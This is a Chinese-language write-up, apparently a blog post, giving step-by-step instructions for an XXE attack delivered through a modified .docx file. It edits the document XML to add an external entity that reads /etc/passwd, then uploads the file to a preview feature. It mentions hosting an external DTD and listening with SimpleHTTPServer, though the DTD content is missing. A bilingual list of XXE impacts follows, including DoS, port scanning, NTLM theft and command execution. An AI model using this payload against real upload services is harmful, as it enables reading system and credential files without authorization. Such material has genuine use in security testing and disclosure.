看到有漏洞详情，但是没有具体说步骤，我这里整理一下：
1、创建一个.docx文件，并随意写入文件<不写文件是打不开的>
2、用7.zip解压.docx文件，找到.xml文件

3、修改.xml文件，插入XXE代码：

<?xml version="1.0" encoding="UTF-8" standalone="yes"?> 
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>    //插入代码 
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

或者使用如下payload：

在自己的服务器上上传ext.dtd文件，内容为：

4、上传.docx文件，点击预览
或者在自己的服务器上监听80端口：

sudo python -m SimpleHTTPServer 80

XXE威胁：

1- DoS on the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con 
1、通过打开file:///dev/random | file:///dev/urandom | file://c:/con/con等文件造成解析系统DOS 

2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker) 
2、通过使用http外部输入进行TCP扫描 
3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back) 
3、非授权访问解析系统上以XML文件存储的数据<攻击者需要采用某种方法是这些数据返回> 
4- DoS on other systems (if parsing system is allowed to establish TCP connections to other systems) 
4、在其他系统上找出DOS<如果解析系统允许与其他系统建立TCP连接> 
5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?) 
5、通过初始化访问访问受攻击者控制服务器的UNC文件窃取NTLM 认证资料 
6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS. 
6、世界末日情景：攻击者可以使用一个广泛部署并且高连接的脆弱应用实现DDOS 
7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper 
- See more at: http://attack-secure.com/hacked-facebook-word-document/#sthash.sggH5LSK.dpuf 
7、目录遍历、读系统和应用文件，在某种情况下还可以使用PHP expect执行系统命令